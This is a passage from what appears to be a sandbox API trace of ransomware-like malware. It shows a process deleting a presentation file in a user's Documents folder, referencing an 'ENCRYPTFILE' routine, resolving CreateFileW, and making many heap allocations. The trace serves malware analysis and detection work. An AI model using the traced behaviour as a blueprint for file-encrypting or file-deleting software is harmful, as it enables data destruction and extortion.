(lpFileName="C:\\Users\\FD1HVy\\Documents\\Lh2OVLi_4PS_2RxxQd.odp" (normalized: "c:\\users\\fd1hvy\\documents\\lh2ovli_4ps_2rxxqd.odp")) returned 0x20 [0076.882] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Lh2OVLi_4PS_2RxxQd.odp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746906c0, ftCreationTime.dwHighDateTime=0x1d5e1e8, ftLastAccessTime.dwLowDateTime=0xd2e63af0, ftLastAccessTime.dwHighDateTime=0x1d5f102, ftLastWriteTime.dwLowDateTime=0xd2e63af0, ftLastWriteTime.dwHighDateTime=0x1d5f102, nFileSizeHigh=0x0, nFileSizeLow=0x83cc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Lh2OVLi_4PS_2RxxQd.odp", cAlternateFileName="LH2OVL~1.ODP")) returned 0x41ac540 [0076.882] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Lh2OVLi_4PS_2RxxQd.odp" (normalized: "c:\\users\\fd1hvy\\documents\\lh2ovli_4ps_2rxxqd.odp")) returned 1 [0076.884] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746906c0, ftCreationTime.dwHighDateTime=0x1d5e1e8, ftLastAccessTime.dwLowDateTime=0xd2e63af0, ftLastAccessTime.dwHighDateTime=0x1d5f102, ftLastWriteTime.dwLowDateTime=0xd2e63af0, ftLastWriteTime.dwHighDateTime=0x1d5f102, nFileSizeHigh=0x0, nFileSizeLow=0x83cc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Lh2OVLi_4PS_2RxxQd.odp", cAlternateFileName="LH2OVL~1.ODP")) returned 0 [0076.884] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0076.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0076.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0076.884] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0076.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0076.885] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0076.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.886] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\LI-IwwMLWnmp-I.pptx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ba22bc0, ftCreationTime.dwHighDateTime=0x1d5bbe6, ftLastAccessTime.dwLowDateTime=0xcebf87c0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xcebf87c0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x6f55, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="LI-IwwMLWnmp-I.pptx", cAlternateFileName="LI-IWW~1.PPT")) returned 0x41ac600 [0076.886] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.886] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22e0 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0076.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9da0 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0076.887] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.887] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0076.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cb0 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0076.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0076.889] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0076.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0076.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0076.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.933] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0076.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0076.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca688, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0076.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.935] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0076.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0076.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0076.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0076.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.936] HeapFree (in: 